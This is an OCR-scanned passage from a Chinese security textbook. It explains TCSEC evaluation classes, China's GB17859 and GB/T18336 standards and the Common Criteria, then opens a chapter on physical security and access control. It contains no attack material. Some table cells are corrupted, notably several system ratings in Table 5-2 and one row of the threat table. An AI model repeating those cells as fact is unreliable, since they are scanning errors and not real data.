美国 国防 部 于 1983 年 推出 了 历史 上 第 一 个 计算 机 安全 评价 标准 (可 信 计 算 机 系统 评 
测 准 则 (Trusted Computer System Evaluation Criteria ,TCSEC)》。TCSEC 带动 了 国际 
上 计算 机 安全 评测 的 研究 ,德国 .英国 .加拿大 、 西 欧 四 国 等 纷纷 制定 了 各 自 的 计算 机 系统 
评价 标准 。 近 年 来 ,我 国 也 制定 了 相应 的 强制 性 国家 标准 GB17859 一 1999《 计 算 机 信息 
系统 安全 保护 等 级 划分 准则 》 和 推荐 标准 GB/T18336 一 2001《 信 息 技 术 安全 技术 信息 技 
术 安 全 性 评估 准则 》。 表 5-1 给 出 了 国内 外 计算 机 评价 标准 的 概况 。 
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表 5-1 国内 外 计算 机 评价 标准 的 概况 


标准 名 称 颁布 的 国家 或 组 织 颁布 年 份 

美国 TCSEC 美国 国防 部 1983 
美国 TCSEC 修订 版 美国 国防 部 1985 
德国 标准 西 德 1988 
英国 标准 英国 1989 
加 拿 大 标准 V1 加 拿 大 1989 
欧洲 ITSEC 西欧 四 国 ( 英 、 法 、 荷 . 德 ) 1991 
联邦 标准 草案 (FC) 美国 1992 
加 拿 大 标准 V3 加 拿 大 1993 
CCV1.0 美 . 荷 .法 \ 德 . 英 、 加 1996 
中 国 军 标 GJB2646 一 96 中 国 国防 科学 技术 委员 会 1996 
CC V2.0 美 . 荷 .法 、 德 , 英 、 加 1997 
ISO/IEC 15408 国际 标准 组 织 1999 
中 国 GB17859 一 1999 中 国 国家 质量 技术 监督 局 1999 
中 国 GB/T18336 一 2001 中 国 国家 质量 技术 监督 局 2001 

2) 美国 TCSEC 

TCSEC 是 美国 国防 部 根据 国防 信息 系统 的 保密 需求 制定 的 ,首次 公布 于 1983 年 。 


后 来 在 美国 国防 部 国家 计算 机 安全 中 心 (NCSC) 的 主持 下 制定 了 一 系列 相关 准则 ,例如 ， 
可 信任 数据 库 解释 (Trusted Database Interpretation) 和 可 信任 网 络 解释 (Trusted 
Network Interpretation) 。 由 于 每 本 书 使 用 了 不 同 颜色 的 书 皮 , 人 们 将 它们 称 为 彩虹 系 
列 。1985 年 ,TCSEC 再 次 修改 后 发 布 ,然后 一 直 沿 用 至 今 。 直 到 1999 年 以 前 ,TCSEC 
一 直 是 美国 评估 操作 系统 安全 性 的 主要 准则 ,其 他 子 系统 ,比如 数据 库 和 网 络 的 安全 性 ， 
也 一 直 是 通过 TCSEC 的 解释 来 评估 的 。 按 照 TCSEC 的 标准 测试 系统 的 安全 性 主要 包 
括 硬 件 和 软件 部 分 ,整个 测试 过 程 对 生产 厂商 来 说 是 很 昂贵 的 ,而 且 往往 需 几 年 才能 完 
成 。 在 美国 ,一 个 申请 某 个 安全 级 别 的 系统 ,只 有 在 符合 所 有 的 安全 要 求 后 才 由 权威 评测 
机 构 NCSC 颁发 相应 的 证 书 。 

3) 美国 TCSEC 评测 准则 介绍 

计算 机 安全 评测 的 基础 是 需求 说 明 , 即 把 一 个 计算 机 系统 称 为 “安全 的 "真实 含义 是 
什么 。 一 般 地 说 ,安全 系统 规定 安全 特性 ,控制 对 信息 的 访问 ,使 得 只 有 授权 的 用 户 或 代 
表 他 们 工作 的 进程 才 拥 有 读 、 写 、 建 立 或 删除 信息 的 访问 权 。 美国 国防 部 早 在 1983 年 就 
基于 这 个 基本 的 目标 ,给 出 了 可 信任 计算 机 信息 系统 的 6 项 基本 需求 ,其 中 4 项 涉及 信息 
的 访问 控制 ,2 项 涉及 安全 保障 。 

(1) 安全 策略 : 必须 有 一 个 显 式 和 良好 定义 的 安全 策略 由 该 系统 实现 。 已 知 标识 的 
主体 和 对 象 。 必 须 有 一 组 规则 ,用 于 确定 一 个 已 知 主体 能 否 允 许 访问 一 指定 对 象 。 根 据 
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安全 策略 ,计算 机 系统 可 以 实施 强制 访问 控制 ,有效 地 实现 处 理 敏 感 (例如 有 等 级 的 ) 信 息 
的 访问 规则 。 此 外 ,需要 建立 自主 访问 控制 机 制 ,确保 只 有 所 选择 的 用 户 或 用 户 组 才 可 以 
访问 指定 数据 。 

(2) 标记 : 访问 控制 标签 必须 对 应 于 对 象 。 为 了 控制 对 存储 在 计算 机 中 信息 的 访 
问 ,按照 强制 访问 控制 规则 ,必须 合理 地 为 每 个 对 象 加 一 个 标签 ,可 靠 地 标识 该 对 象 的 敏 
感 级 ,以 及 与 可 能 访问 该 对 象 的 主体 相符 的 访问 方式 。 

(3) 标识 : 每 个 主体 都 必须 予以 标识 。 对 信息 的 每 次 访问 都 必须 通过 系统 决定 。 标 
识 和 授权 信息 必须 由 计算 机 系统 安全 地 维护 。 

(4) 审计 : 可 信任 系统 必须 能 将 与 安全 有 关 的 事件 记录 到 审计 记录 中 。 必 须 有 能 力 
选择 所 记录 的 审计 事件 ,减少 审计 开销 。 审 计数 据 必须 予以 保护 , 免 遭 修改 、 破 坏 或 非 授 
权 访 问 。 

(5) 保证 : 为 保证 安全 策略 、 标 记 、 标 识 和 审计 这 4 个 需求 被 正确 实施 ,必须 有 某 些 硬 
件 和 软件 实现 这 些 功 能 。 这 组 软件 或 硬件 在 典型 情况 下 被 嵌入 操作 系统 中 ,并 设计 为 以 
安全 方式 执行 所 赋予 的 任务 。 

(6) 连续 保护 : 实现 这 些 基 本 需求 的 可 信任 机 制 必须 连续 保护 ,避免 自 改 和 非 授 权 
改变 。 如 果实 现 安全 策略 的 基本 硬件 和 软件 机 制 本 身 易 遭 到 非 授 权 修 改 或 破坏 , 则 任何 
这 样 的 计算 机 系统 都 不 能 被 认为 是 真正 安全 的 。 连 续 保护 需求 在 整个 计算 机 系统 生命 周 
期 中 均 有 意义 。 

根据 以 上 6 项 基本 需求 ,TCSEC 在 用 户 登 录 、 授 权 管理 .访问 控制 .审计 跟踪 、 隐 蔽 信 
道 分 析 、 可 信 通 路 建立 .安全 检测 .生命 周期 保障 ,文档 写作 等 各 方面 , 均 提 出 了 规范 性 要 
求 , 并 根据 所 采用 的 安全 策略 .系统 所 具备 的 安全 功能 将 系统 分 为 四 类 7 个 安全 级 别 。 亦 
即 : D 类 、C 类 、B 类 和 A 类 ,以 层次 方式 排序 ,最 高 类 A 代表 安全 性 最 高 的 系统 。 其 中 ， 
C 类 和 B 类 又 有 若干 子 类 称 为 级 ,级 也 以 层次 方式 排序 ,各 级 别 安 全 可 信 性 依次 增高 , 较 
高 级 别 包含 较 低级 别 的 安全 性 。 

在 每 个 级 别 内 ,准则 分 为 四 个 主要 部 分 。 前 三 部 分 叙述 满足 安全 策略 .审计 和 保证 的 
主要 控制 目标 。 第 四 部 分 是 文档 ,描述 文档 的 种 类 ,以 及 编写 用 户 指 南 、 手 册 、 测 试 文档 和 
设计 文档 的 主要 要 求 。 

D 类 只 包含 一 个 级 别 一 一 D 级 ,是 安全 性 最 低 的 级 别 。 不 满足 任何 较 高 安全 可 信 性 
的 系统 全 部 划 入 D 级 。 该 级 别 说 明 整 个 系统 都 是 不 可 信任 的 。 对 硬件 来 说 ,没有 任何 保 
护 作用 ,操作 系统 容易 受到 损害 ;不 提供 身份 验证 和 访问 控制 。 例 如 , MS -DOS、 
Macintosh System 7. X 等 操作 系统 属于 这 个 级 别 。 

C 类 为 自主 保护 类 (Discretionary Protection) 。 该 类 的 安全 特点 在 于 系统 的 对 象 (如 
文件 .目录 ) 可 由 其 主体 (如 系统 管理 员 .用户 应 用 程序 ) 自 定义 访问 权 。 自 主 保护 类 依据 
安全 从 低 到 高 又 分 为 C1、C2 两 个 安全 等 级 。 

Cl 级 ; 又 称 自主 安全 保护 (Discretionary Security Protection) 系 统 , 实 际 上 描述 了 一 
个 典型 的 UNIX 系统 上 可 用 的 安全 评测 级 别 。 对 硬件 来 说 ,存在 某 种 程度 的 保护 。 用 户 
必须 通过 用 户 注册 名 和 口令 系统 识别 ,这 种 组 合用 来 确定 每 个 用 户 对 程序 和 信息 拥有 什 
么 样 的 访问 权限 。 具 体 地 说 ,这 些 访问 权限 是 文件 和 目录 的 许可 权限 (Permission)。 存 
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在 一 定 的 自主 访问 控制 机 制 (DAC) ,这 些 自主 访问 控制 使 得 文件 和 目录 的 拥有 者 或 者 系 
统管 理 员 ,能 够 阻止 某 个 人 或 几 组 人 访问 哪些 程序 或 信息 。UNIX 的 “Owner/Group/ 
Other" 访 问 控制 机 制 , 即 是 一 种 典型 的 事例 。 

但 是 这 一 级 别 没有 提供 阻止 系统 管理 账户 行为 的 方法 ,结果 是 不 审慎 的 系统 管理 员 
可 能 在 无 意 中 损害 了 系统 的 安全 。 

另外 在 这 一 级 别 中 ,许多 日 常 系统 管理 任务 只 能 通过 超级 用 户 执行 。 由 于 系统 无 法 
区 分 哪个 用 户 以 Root 身份 注册 系统 执行 了 超级 用 户 命令 ,因而 容易 引发 信息 安全 问题 ， 
且 出 了 问题 以 后 难以 追究 责任 。 

C2 级 : 又 称 受 控制 的 访问 控制 系统 。 它 具有 以 用 户 为 单位 的 DAC 机 制 , 且 引 入 了 
审计 机 制 。 

除 Cl 级 包含 的 安全 特征 外 ,C2 级 还 包含 其 他 的 受 控 访 问 环 境 (Controlled-Access 
Environment) 的 安全 特征 。 该 环境 具有 进一步 限制 用 户 执 行 某 些 命令 或 访问 某 些 文件 
的 能 力 , 这 不 仅 基于 许可 权限 ,而 且 基 于 身份 验证 级 别 。 另 外 ,这 种 安全 级 别 要 求 对 系统 
加 以 审计 ,包括 为 系统 中 发 生 的 每 个 事件 编写 一 个 审计 记录 。 审 计 用 来 跟踪 记录 所 有 与 
安全 有 关 的 事件 ,比如 那些 由 系统 管理 员 执 行 的 活动 。 

B 类 为 强制 保护 类 (Mandatory Protection)。 该 类 的 安全 特点 在 于 由 系统 强制 的 安 
全 保护 ,在 强制 保护 模式 中 ,每 个 系统 对 象 (如 文件 .目录 等 资源 ) 及 主体 (如 系统 管理 员 、 
用 户 .应 用 程序 ) 都 有 自己 的 安全 标签 (Security Label) ,系统 则 依据 主体 和 对 象 的 安全 标 
签 赋予 他 对 访问 对 象 的 访问 权限 。 强 制 保护 类 依据 安全 从 低 到 高 又 分 为 B1、B2、B3 三 个 
安全 等 级 。 

Bl 级 或 标记 安全 保护 (Labeled Security Protection) 级 : B1 级 要 求 具 有 C2 级 的 全 部 
功能 ,并 引入 强制 访问 控制 (MAC) 机 制 ,以 及 相应 的 主体 、 客 体 安全 级 标记 和 标记 管理 。 
它 是 支持 多 级 安全 (比如 秘密 和 绝密 ) 的 第 一 个 级 别 , 这 一 级 别 说 明 一 个 处 于 强制 性 访问 
控制 之 下 的 对 象 ,不 允许 文件 的 拥有 者 改变 其 访问 许可 权限 。 

B2 级 或 结构 保护 (Structured Protection) 级 : B2 级 要 求 具 有 形式 化 的 安全 模型 描 
述 式 顶 层 设计 说 明 (DTDS) 、 更 完善 的 MAC 机制、 可 信和 通路 机 制 、 系 统 结构 化 设计 、 最 小 
特权 管理 、 隐 蔽 信道 分 析 和 处 理 等 安全 特征 。 它 要 求 计算 机 系统 中 所 有 的 对 象 都 加 标记 ， 
而 且 给 设备 (如 磁盘 、 磁 带 或 终端 ) 分 配 单个 或 多 个 安全 级 别 。 这 是 提供 较 高 安全 级 别 的 
对 象 与 男 一 个 较 低 安全 级 别 的 对 象 相互 通讯 的 第 一 个 级 别 。 

B3 级 或 安全 域 (Security Domain) 级 : B3 级 要 求 具 有 全 面 的 访问 控制 机 制 、 严 格 的 
系统 结构 化 设计 及 TCB 最 小 复杂 性 设计 、 审 计 实 时 报告 机 制 、 更 好 地 分 析 和 解决 隐蔽 信 
道 问 题 等 安全 特征 。 它 使 用 安装 硬件 的 办 法 增强 域 的 安全 性 ,例如 ,内 存 管理 硬件 用 于 保 
护 安 全 域 免 遭 无 授权 访问 或 其 他 安全 域 对象 的 修改 。 该 级 别 也 要 求 用 户 的 终端 通过 一 条 
可 信任 途径 连接 到 系统 上 。 

A 类 为 验证 设计 保护 类 (Verify Design) : A 类 是 当前 TCSEC 中 最 高 的 安全 级 别 , 它 
包含 了 一 个 严格 的 设计 ,控制 和 验证 过 程 。 与 前 面 提 到 的 各 级 别 一 样 。 这 一 级 包含 了 较 
低级 别 的 所 有 特性 。 设 计 必 须 是 从 数学 上 经 过 验证 的 ,而 且 必 须 进 行 隐蔽 信道 和 可 信任 
分 布 的 分 析 。 可 信任 分 布 (Trusted Distribution) 的 含义 是 ,硬件 和 软件 在 传输 过 程 中 已 
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经 受到 保护 ,不 可 能 破坏 安全 系统 。 验 证 设计 保护 类 只 有 一 个 安全 等 级 , 即 Al 级 。 

Al 级 要 求 具有 系统 形式 化 顶层 设计 说 明 (FTDS) ,并 形式 化 验证 FTDS 与 形式 化 模 
型 的 一 致 性 ,以 及 用 形式 化 技术 解决 隐蔽 信道 问题 等 。 

美国 国防 部 采购 的 系统 要 求 其 安全 级 别 至 少 达 到 B 类 ,商业 用 途 的 系统 也 追求 达到 
C 类 安全 级 别 。 但 是 ,国外 厂商 向 我 国 推销 安全 功能 符合 TCSEC B 类 和 以 上 级 别 的 计算 
机 系统 是 限制 的 。 因 此 ,自主 开发 符合 TCSEC 中 B 类 安全 功能 的 安全 操作 系统 一 直 是 
我 国 近 几 年 来 研究 的 热点 。 

TCSEC 的 详细 内 容 , 限 于 篇 幅 不 再 介绍 。 

4) 通过 TCSEC 评测 认证 的 部 分 系统 

表 5-2 给 出 美国 国家 计算 机 安全 中 心 NCSC 评测 通过 的 若干 安全 系统 。 

表 5-2 通过 美国 国家 计算 机 安全 中 心 评 测 的 若干 安全 系统 


制 造 商 系 统 等 级 
HFS 公司 UNIX 操作 系统 XTS-200B 版 本 STOP3. 1E B3 
TIS 公司 可 信 XENIX3. 0 操作 系统 B2 
TIS 公司 UNIX 操作 系统 ,V/MLS,Release 1.2 Bl 
SW 公司 CMW1.0 Bl 
并 行 计算 机 公司 可 信 OS/32Release08-03. 3s (2 
Convex 公司 OS/Secure V10.0UNIX 操作 系统 De 
HP 公司 MPE V/E Release GO3. 04 Le 
波音 公司 MLS LAN 安全 网 络 服务 器 Al 
控制 数据 公司 网 络 操作 系统 (NOS) C2 


5) 中 国 国标 GB17859 一 1999 

1999 年 10 月 19 日 中 国 国 家 技术 监督 局 发 布 了 中 华人 民 共 和 国 国 家 标准 GB17859 
1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》, 该 准则 参考 了 美国 TCSEC《 可 信 计 算 机 
系统 评估 准则 》 和 《可 信 计 算 机 网 络 系统 说 明 》(CNCSC-TG-005) ,将 计算 机 信息 系统 安全 
保护 能 力 划分 为 5 个 等 级 , 即 : 

第 一 级 : 用 户 自主 保护 级 ; 

第 二 级 : 系统 审计 保护 级 ; 

第 三 级 : 安全 标记 保护 级 ; 

第 四 级 : 结构 化 保护 级 ; 

第 五 级 : 访问 验证 保护 级 。 

计算 机 信息 系统 安全 保护 能 力 随 着 安全 保护 等 级 的 增高 ,逐渐 增强 。 一 般 认为 我 国 
GB17859 一 1999 的 第 四 级 对 应 于 TCSEC B2 级 ,第 五 级 对 应 于 TCSEC B3 级 。 

6) 国际 通用 安全 评价 准则 CC 

美国 联合 荷 .法 , 德 , 英 、 加 拿 大 等 国 , 于 1991 年 1 月 宣布 了 制定 通用 安全 评价 准则 
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(Common Criteria for IT Security Evaluation, CC) 的 计划 。1996 年 1 月 发 布 了 CC 的 
1.0 版, 它 的 基础 是 欧洲 的 ITSEC、 美 国 的 TCSEC、 加 拿 大 的 CTCPEC, 以 及 国际 标准 化 
组 织 ISO SC27 WG3 的 安全 评价 标准 。1999 年 7 月 ,国际 标准 化 组 织 ISO 将 CC 2. 0 作 
为 国际 标准 一 一 ISO/IEC 15408 公布 。CC 标准 提出 了 “保护 轮廓 ”, 将 评估 过 程 分 为 “ 功 
能 ”和 “保证 ”两 部 分 ,是 目前 最 全 面 的 信息 技术 安全 评估 标准 。CC 标准 在 内 容 上 包括 三 
部 分 : 一 是 简介 和 一 般 模型 ,二 是 安全 功能 要 求 ,三 是 安全 保证 要 求 。 

7) 中 国 推 荐 标准 GB/T18336 一 2001 

中 国 推荐 标准 GB/T18336 一 2001《 信 息 技 术 安全 技术 信息 技术 安全 性 评估 准则 ;是 
由 中 国 国 家 质量 技术 监督 局 2001 年 发 布 的 信息 技术 安全 性 评估 准则 , 它 几 乎 等 同 采用 了 
国际 CC 标准 。 其 分 为 三 部 分 :《 第 一 部 分 : 简介 和 一 般 模型 )《 第 二 部 分 : 安全 功能 要 
求 》 和 《第 三 部 分 : 安全 保证 要 求 》。 


5.5 本 章 小 结 


本 童 首先 对 安全 操作 系统 的 概念 进行 了 简单 概述 ;其 次 描述 了 主要 的 安全 策略 和 模 
型 ,安全 策略 包括 军事 安全 策略 和 商业 安全 策略 ,安全 模型 包括 具有 代表 性 的 BLP 机 密 
性 安全 模型 .Biba 完整 性 安全 模型 和 RBAC 安全 模型 ;再 次 ,描述 了 安全 操作 系统 的 访问 
控制 机 制 ;最 后 ,给 出 了 操作 系统 的 典型 缺陷 ,安全 操作 系统 的 评测 方法 与 评估 准则 。 
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1. 你 的 个 人 计算 机 所 用 操作 系统 的 安全 级 别 是 什么 ? 它 是 安全 操作 系统 吗 ? 
2. 请 分 别 简 述 自主 访问 控制 ,强制 访问 控制 和 基于 角色 的 访问 控制 的 基本 内 容 以 及 
它们 之 间 的 异同 点 。 
3. 请 查阅 资料 对 比 中 国 GB17859 一 1999 的 第 四 级 要 求 与 美国 TCSEC 的 B2 级 的 异 
同 处 。 


4. 国际 通用 准则 CC 比美 国 国防 部 可 信 计 算 机 系统 评测 准则 主要 做 了 什么 改进 ? 
5. 找 一 套 最 新 版 本 的 Linux 系统 ,实际 测试 一 下 其 所 提供 的 安全 功能 。 
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本 章 学 习 要 点 : 

名 了 解 物理 安全 的 意义 、 内 容 和 基本 防护 方法 ; 
如 了 解 物理 隔离 的 基本 思想 及 方法 ; 

名 了 解 生物 识别 技术 的 基本 原理 ; 

名 了 解 物理 安全 管理 的 基本 措施 。 


6.1 物理 安全 概述 


物理 安全 (Physical Security) 研 究 如 何 保护 网 络 与 信息 系统 的 物理 设备 .设施 和 配套 
部 件 的 安全 性 能 .所 处 环境 安全 以 及 整个 系统 的 可 靠 运 行 ,使 其 免 遭 自然 灾害 、 环 境 事故 、 
人 为 操作 失误 及 计算 机 犯罪 行为 导致 的 破坏 ,是 信息 系统 安全 运行 的 基本 保障 。 

物理 安全 的 概念 如 图 6-1 所 示 ,传统 意义 的 物理 安全 包括 设备 安全 、 环 境 安全 /设施 
安全 以 及 介质 安全 ;广义 的 物理 安全 还 应 包括 由 软件 ,硬件 ,操作 人 员 组 成 的 整体 信息 系 
统 的 物理 安全 , 即 包括 系统 物理 安全 。 信 息 系 统 安全 体现 在 信息 系统 的 保密 性 、 可 用 性 、 
完整 性 三 方面 ,从 物理 层面 出 发 ,系统 物理 安全 技术 应 确保 信息 系统 的 保密 性 、 可 用 性 、 完 
整 性 ,如 : 通过 边界 保护 .配置 管理 .设备 管理 等 措施 保护 信息 系统 的 保密 性 ,通过 容错 、 
故障 恢复 .系统 灾难 备份 等 措施 确保 信息 系统 的 可 用 性 ,通过 设备 访问 控制 .边界 保护 、 设 
备 及 网 络 资源 管理 等 措施 确保 信息 系统 的 完整 性 。 
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广义 物理 安全 (系统 物理 安全 ) 


狭义 物理 安全 


图 6-1 物理 安全 概念 
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信息 系统 物理 安全 面临 多 种 威胁 ,可 能 面临 自然 \ 环 境 和 技术 故障 等 非 人 为 因素 的 威 
胁 ,也 可 能 面临 人 员 失 误 和 恶意 攻击 等 人 为 因素 的 威胁 ,这 些 威胁 通过 破坏 信息 系统 的 保 
密 性 (如 电磁 泄漏 类 威胁 ) ,完整 性 (如 各 种 自然 灾难 类 威胁 ) 、 可 用 性 (如 技术 故障 类 威胁 ) 
进而 威胁 信息 的 安全 。 造 成 威胁 的 因素 可 分 为 人 为 因素 和 环境 因素 : 根据 威胁 的 动机 ， 
人 为 因素 又 可 分 为 恶意 和 非 恶 意 两 种 ;环境 因素 包括 自然 界 不 可 抗 的 因素 和 其 他 物理 因 
素 。 表 6-1 对 信息 系统 面临 的 物理 安全 威胁 种 类 进行 了 描述 。 


表 6-1 物理 安全 威胁 分 类 表 


种 类 描 述 

自然 灾害 地 震 、 洪 水 .风暴 ,龙卷风 等 

物理 环境 影响 火灾 、 漏 水、 温度 湿度 变化 .有害 气 体 等 

电磁 环境 影响 通信 中 断 、 电 力 中 断 、 电 磁 泄 漏 、 静 电 等 

软 硬 件 故 障 由 于 设备 硬件 故障 、 通 信和 链 路 中 断 、 系 统 本 身 或 软件 缺陷 造成 对 信息 系统 安 
全 可 用 的 影响 

物理 攻击 物理 接触 物理 破坏 .盗窃 ,废物 搜寻 等 

无 作为 或 操作 失误 人 

管理 不 到 位 物理 安全 管理 无 法 落实 \ 不 到 位 ,造成 物理 安全 管理 不 规范 ,或 者 管理 混乱 ， 
从 而 破坏 信息 系统 正常 有 序 运行 

恶意 代码 和 病毒 改变 物理 设备 的 配置 ,甚至 破坏 设备 硬件 电路 ,导致 物理 设备 失效 或 损坏 

网 络 攻击 利用 工具 和 技术 ,如 拒绝 服务 等 ,非法 占用 系统 资源 ,降低 系统 可 用 性 

越权 或 滥用 通过 采用 一 些 措施 ,超越 自己 的 权限 访问 了 本 来 无 权 访问 的 资源 ,或 者 滥用 
自己 的 职权 ,做 出 破坏 信息 系统 的 行为 ,如 : 非法 设备 接 入 、 设 备 非法 外 联 
设 ; 吕 ， 东 ;未 容 

设计 .配置 缺陷 dt i ii 系统 未 能 正确 有 效 配 置 ,系统 扩容 和 


物理 安全 主要 用 来 解决 两 个 方面 的 问题 : 一 方面 是 针对 信息 系统 实体 的 保护 , 另 一 
方面 针对 可 能 造成 的 信息 泄露 的 物理 问题 进行 防范 。 其 主要 内 容 包 括 以 下 几 点 : 

(1) 环境 安全 : 应 具备 消防 报警 、 安 全 照明 ,不 间断 供电 、 温 湿度 控制 系统 等 。 环 境 
安全 技术 主要 包括 : 

@ 安全 保卫 技术 ,主要 的 安全 技术 措施 包括 防盗 报警 .实时 电子 监控 ,安全 门禁 等 ， 
是 环境 安全 技术 的 重要 一 环 。 

@ 计算 机 机 房 的 温度 、 湿 度 等 环境 条 件 保持 技术 ,可 以 通过 加 装 通 风 设 备 、 排 烟 设 
备 、 专 业 空调 设备 来 实现 。 

@ 计算 机 机 房 的 用 电 安 全 技术 ,主要 包括 不 同 用 途 电 源 分 离 技 术 、 电 源 和 设备 有 效 
接地 技术 .电源 过 载 保护 技术 和 防 雷 击 技术 等 。 

@ 计算 机 机 房 安全 管理 技术 , 指 制定 严格 的 计算 机 机 房 工 作 管理 制度 ,并 要 求 所 有 
进入 机 房 的 人 员 严格 遵守 管理 制度 ,将 制度 落 到 实处 。 
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(2) 电源 系统 安全 : 电源 安全 主要 包括 电力 能 源 供应 、 输 电线 路 安全 ,保持 电源 的 稳 
定性 等 。 

(3) 设备 安全 : 要 保证 硬件 设备 随时 处 于 良好 的 工作 状态 ,建立 健全 使 用 管理 规章 
制度 ,建立 设备 运行 日 志 。 同 时 要 注意 保护 存储 媒体 的 安全 性 ,包括 存储 媒体 自身 和 数据 
的 安全 。 设 备 安全 防护 技术 主要 包括 防盗 技术 (报警 .追踪 系统 等 )、 防 火 、 防 静电 、 防 雷 
击 等 。 

(4) 通信 线路 安全 : 包括 防止 电磁 信息 的 泄漏 .线路 截获 (窃听 ) 、 抗 电磁 干扰 等 安全 
技术 。 

此 外 ,基于 物理 环境 的 容 灾 技术 (灾难 的 预警 .应 急 处 理 和 恢复 ) 和 物理 隔离 技术 ,也 
属于 物理 安全 技术 的 范畴 。 

物理 安全 涉及 的 主要 技术 标准 包括 : 

Q@《 信 息 安全 技术 信息 系统 物理 安全 技术 要 求 )(GB/T 21052 一 2007) ,针对 信息 系 
统 的 物理 安全 制定 的 ,将 物理 安全 技术 等 级 分 为 五 个 不 同 级 别 , 并 对 信息 系统 安全 提出 了 
物理 安全 技术 方面 的 要 求 。 

@《 信 息 安全 技术 信息 系统 安全 通用 技术 要 求 )KGB/T 20271 一 2006) ,在 信息 系统 
五 个 安全 等 级 划分 中 ,规定 了 对 于 物理 安全 技术 的 不 同 要 求 。 

@ 《计算机 场地 安全 要 求 》(GB/T 9361 一 2011) 和 《电子 计算 机 场地 通用 规范 》 
(GB/T 2887 一 2000) ,是 计算 机 机 房 建设 应 遵循 的 标准 ,满足 防火 防磁 、 防 水、 防盗 \ 防 电 
击 等 要 求 , 并 配备 相应 的 设备 。 

@《 信 息 系 统 安全 等 级 保护 基本 要 求 )(GB/T 22239 一 2008) 。 

《电子 信息 系统 机 房 设计 规范 》(GB 50174 一 2008) 。 

人 《信息 技术 设备 用 不 间断 电源 通用 技术 条 件 》(GB/T 14715 一 1993)。 

物理 安全 是 整个 网 络 与 信息 系统 安全 的 必要 前 提 , 如 果 物 理 安全 得 不 到 保证 ,那么 其 
他 一 切 安全 措施 都 将 无 济 于 事 。 即 使 是 在 云 计算 环境 下 ,用 户 从 云端 获取 网 络 基 础 设施 
服务 ,看 起 来 用 户 不 再 需要 考虑 物理 安全 问题 ,但 实际 上 对 物理 安全 的 控制 转移 到 了 云 计 
算 服务 提供 商 手 中 , 云 服务 提供 商 需 要 更 强大 的 物理 安全 控制 技术 、 更 严密 的 管理 措施 来 
保证 云端 的 物理 安全 。 


6.2 物理 安全 技术 


621 物理 访问 控制 


物理 访问 控制 (Physical Access Control) 主 要 是 指 对 进出 办 公 楼 、 实 验 室 、 服 务 器 机 
房 , 数 据 中 心 等 关键 资产 运营 相关 场所 的 人 员 进 行 严格 的 访问 控制 。 系 统 中 线路 连接 所 
涉及 的 场所 也 需要 进行 严格 控制 ,如 电力 供应 房间 、 数 据 备 份 存储 区 .电话 线 和 数据 线 的 
连接 区 等 。 此 外 ,还 可 以 利用 闭路 电视 摄像 机 、 运 动 探测 器 及 其 他 设备 进行 监控 ,检测 到 
可 能 的 入 侵 行 为 。 

现 有 的 物理 访问 控制 技术 和 措施 主要 包括 : 
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(1) 门卫 。 在 每 个 出 入 口 配备 门卫 ,能 够 对 非 授权 的 进入 者 产生 威慑 ,在 某 些 情况 
下 ,能 够 阻止 非 授 权 进入 。 

(2) ID 卡 。 为 企业 或 机 构 的 所 有 员工 、 合 作 人 员 配 备 ID 卡 。 常 见 的 方式 主要 包括 
两 种 ,一 种 是 带 照片 的 证 件 , 一 种 是 智能 卡 。 智 能 卡 具 有 和 较 高 的 安全 性 和 便携 性 : 

@ 能 够 存储 人 员 信息 ,并 具备 防臭 改 机 制 ; 

@ 能 够 在 卡 内 进行 高 安全 度 的 信息 处 理 ,如 电子 签名 、 加 密 等 ; 

@@ 使 用 加 密 系 统 存储 密 钥 ; 

@ 能 够 提供 安全 的 授权 级 别 , 对 不 同 级 别 的 人 员 进 行 访问 控制 。 

(3) 电子 门禁 卡 ,包括 : 

Q@ RFID 感应 卡 , 也 称 为 EM 卡 ,工作 频率 是 125kHz, 采 用 射频 无 线 发 射 技术 ;成 本 
较 低 ,有 开门 记录 ,但 安全 性 一 般 ,容易 复制 ,不 易 双 向 控制 ,卡片 信息 容易 因 外 界 磁场 丢 
失 而 导致 卡片 无 效 。 

@ IC 卡 ,也 称 M1 卡 , 工 作 频 率 13. 56MHz, 是 目前 应 用 比较 广泛 的 一 种 卡 类 型 , 例 
如 二 代 身 份 证 。IC 卡 的 优点 是 卡片 与 设备 无 接触 ,开门 方便 安全 ;安全 性 高 ,有 开门 记 
录 , 可 以 实现 双向 控制 ,卡片 很 难 被 复制 。 

@ CPU 卡 , 芯 片 内 含有 一 个 微 处 理 器 。 通 常 CPU 卡 内 含有 随机 数 发 生 器 、 硬 件 
DES、3DES 加 密 算法 等 ,配合 操作 系统 即 片上 OS, 可 以 达到 金融 级 别 的 安全 等 级 , 比 传 
统 的 M1 卡 有 着 更 强 的 安全 性 。 

(4) 电子 监控 和 监控 摄像 机 。 电 子 监控 技术 主要 是 指 利用 光电 (photoelectric) ,超声 
(ultrasonic) ,微波 (microwave) ,红外 (passive infrared)、 压 感 (pressure-sensitive) 等 传 感 
器 ,来 检测 区 域 访问 并 报警 。 闭 路 电视 (Closed Circuit Television,CCTV) 使 用 照相 机 通 
过 传输 媒介 将 图 片 传送 到 连接 显示 器 的 电视 传输 系统 ,传输 媒介 可 以 使 用 光线、 微波 、 无 
线 电 波 或 红外 光束 。 

(5) 金属 探测 器 。 利 用 电磁 感应 、X 射线 检测 、 微 波 检测 等 技术 ,可 以 探测 随身 携带 
或 隐藏 的 武器 与 作案 工具 。 

(6) 电 围栏 。 

(7) 报警 系统 。 报 警 系统 经 常 与 监控 系统 协同 使 用 ,类 似 于 IDS, 检 测 物 理 入 侵 行 
为 ,以 及 进行 火灾 报警 .烟雾 报警 .地 震 报警 .防盗 报警 等 。 

(8) 生物 识别 。 通 过 计算 机 与 光学 ,声学 .生物 传感器 和 生物 统计 学 原理 等 高 科技 手 
段 密切 结合 ,利用 人 体 固 有 的 生理 特性 (如 指纹 、 脸 像 .虹膜 等 ) 和 行为 特征 (如 笔迹 声音 、 
步 态 等 ) 来 进行 个 人 身份 的 鉴定 。 

(9) 密码 锁 。 密 码 锁 包括 传统 的 密码 锁 和 可 编程 电子 密码 锁 两 类 。 电 子 密 码 锁 通 过 
密码 输入 来 控制 电路 或 是 芯片 工作 ,从 而 控制 机 械 开关 的 闭合 ,完成 开锁 、 闭 锁 任 务 。 


622 生物 识别 技术 


生物 识别 技术 (Biometric Technology) ,是 指 通过 计算 机 与 光学 声学、 生物 传感器 和 
生物 统计 学 原理 等 高 科技 手段 密切 结合 ,利用 人 体 固 有 的 生理 特性 和 行为 特征 来 进行 个 
